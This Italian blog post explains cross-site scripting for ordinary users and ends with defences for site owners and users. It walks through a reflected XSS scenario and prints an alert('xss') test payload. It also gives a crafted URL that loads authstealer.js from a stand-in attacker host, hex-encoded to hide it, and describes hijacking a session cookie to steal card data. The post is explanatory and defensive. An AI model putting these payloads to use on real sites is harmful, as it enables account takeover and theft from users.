XSS attack – Cross-site scripting. Nelle mail ci sono link con caratteri strani !

Attenti ai link.

Salve. Volevo sapere se potete aiutarmi a capire cosa sono quei link che mi arrivano in messaggi su Facebook e anche su WhatsApp. Hanno tanti caratteri strani. “

Ogni giorno milioni di persone ricevono mail e messaggi (attraverso le più svariate piattaforme). Alcune di esse contengono informazioni utili,altre sono solo sana pubblicità.

Quelle che ci interessano, sono quelle con mittenti “conosciuti” e testi ingannevoli  che ci suggeriscono di seguire un link.

Un click su quel link e potrebbe iniziare la votra odissea !  Anche se un  vostro amico vi raccomanda di seguire un link , è molto probabile che abbiano già “violato” il suo profilo o la sua mail, o che la sua periferica (pc o smartphone) sia stata compromessa da un malware.

Il filo conduttore di ogni e-mail/messaggio è che contengono dei link. Questi link utilizzano domini rediretti e hanno un percorso URL che conduce a una pagina di destinazione di solito scritta in  PHP. Se un utente clicca sui link, viene portato ad un file che può causare solo danni.

Potreste scaricare un malware , e , se siete sprovvisti di un buon antivirus, quasi sicuramente diventereste uno zombie appartenente a qualche bootnet.

Però potreste essere stati presi di mira con un attacco del tipo Cross-site scripting. L’XSS attack è subdolo e pericolosissimo. Può avvalersi dell’utilizzo di siti web ignari di ciò che nascondono o di circuiti pubblicitari ormai compromessi.

""document.cookie()</script

Il XSS basato su DOM : L’attacco basato su DOM si verifica quando viene eseguito un payload di attacco a seguito della modifica del modello di oggetto documento (DOM) del sito web nel browser dell’utente della vittima. La stessa pagina web non è modificata, ma il suo codice lato client viene eseguito in modo alterato a causa di queste modifiche DOM. In questo caso, il server o il database dell’applicazione Web non è mai coinvolto. Questa è una distinzione importante perché molti prodotti di protezione non possono catturare questo tipo di attacco se l’input “maligno” non raggiunge il server.

Esempio di XSS attack

Su WK si ritrova un bel esempio  di attacco non persistene …. Facile da implementare e da far girare ad esempio su i Social. Quindi Attenzione !!!!

  1. Alice visita spesso un particolare sito web, che è ospitato da Bob. Il sito web di Bob permette ad Alice di autenticarsi con username e password e di memorizzare dati sensibili (come i dati di fatturazione). Quando accede nel sistema, il browser mantiene un cookie di autenticazione, che si presenta come un insieme di caratteri illeggibili, in modo che entrambi i computer (client e server) si ricordino della sua autenticazione.
  2. Mallory nota che il sito di Bob contiene una vulnerabilità XSS di tipo reflected:
    1. Quando si visita la pagina di ricerca, si inserisce un termine nella casella di ricerca e si fa click sul tasto invio.  Se non ci sono risultati la pagina visualizzerà il termine cercato seguito dalle parole “non trovato” .  L’URL sarà http://bobssite.org?q=her
    2. Con una normale query di ricerca, come la parola “cuccioli”, la pagina visualizzerà semplicemente “cuccioli non trovato” e l’URL è http://bobssite.org?q=cuccioli (questo è un comportamento normale).
    3. Tuttavia, quando si invia una query anomala di ricerca, come <scripttype='text/javascript'>alert('xss');</script>,
      1. Viene visualizzato un box di avviso che dice “xss”
      2. La pagina visualizza “<scripttype='text/javascript'>alert('xss');</script> non trovato” insieme a un messaggio di errore con il testo “xss”
      3. L’URL sfruttabile è http://bobssite.org?q=<script type='text/javascript'>alert('xss');</script>
  3. Mallory crea un URL per sfruttare l’exploit

Creamo L’URL

  1. Crea l’URL http://bobssite.org?q=cuccioli<script%20src="https://mallorysevilsite.com/authstealer.js"></script> . Sceglie di convertire i caratteri ASCII in esadecimale, ad esempio http://bobssite.org?q=cuccioli%3Cscript%2520src%3D%22http%3A%2F%2Fmallorysevilsite.com%2Fauthstealer.js%22%3E in modo che eventuali lettori umani non possano immediatamente decifrare l’URL dannoso.
  2. Invia una mail ad alcuni ignari membri del sito di Bob, in cui scrive: “Controlla alcuni simpatici cuccioli”
  1. Alice riceve la mail, dato che ama i cuccioli apre il link. Andrà quindi sul sito di Bob per la ricerca, non trovando nulla visualizzerà “Cuccioli non trovato”, ma lo script di Mallory, authstealer.js, eseguirà, invisibile sullo schermo, scatenando l’attacco XSS.
  2. Il programma authstealer.js esegue nel browser di Alice come se fosse stato inviato dal sito di Bob. Prende una copia del cookie di autenticazione di Alice e lo invia al server di Mallory, dove Mallory lo recupererà.
  3. Mallory adesso inserisce il cookie di autenticazione di Alice nel suo browser come se fosse il proprio. Va poi sul sito di Bob, adesso è autenticato come Alice.
  4. Ora che è riconosciuta dal sito come Alice va nella sezione fatturazione del sito e guarda il numero di carta di credito e lo copia. Cambia anche la password in modo che Alice non possa nemmeno più entrare.
  5. Decide di fare un ulteriore passo avanti e invia un collegamento simile a Bob stesso, guadagnando così i privilegi di amministratore.

 

Come Difendersi da XSS attack

Per coloro che gestiscono piccole realtà web.

Affinché questo attacco non si verifichi oppure per ridurne gli effetti nel casi si verificasse si possono adottare differenti strategie:

  1. L’input del campo di ricerca potrebbe essere analizzata per correggere o eliminare eventuali codici.
  2. Il server web potrebbe:
  • essere impostato in modo da reindirizzare le richieste non valide.
  • rilevare un accesso simultaneo e invalidare le sessioni.
  • rilevare un accesso simultaneo da due diversi indirizzi IP e invalidare le sessioni.
  1. Il sito web potrebbe visualizzare solo le ultime cifre della carta di credito utilizzata in precedenza.
  2. Il sito web potrebbe richiedere agli utenti di inserire nuovamente la propria password prima di cambiare le informazioni di registrazione.
  3. Gli utenti potrebbero essere istruiti a non cliccare link dall’aspetto innocente in realtà malevoli

Per l’utente

Munirsi di una efficace protezione antivirus che abbia anche la funzione di controllo Web e Mail.

Fare molta attenzione su ciò che si clicca. Non esisterà mai un antivirus più potente del nostro buon senso.

Sembra troppo semplice….. ma è tanto pericoloso.

State Attenti ai link che vi mandano , potrebbe essere un attacco xss !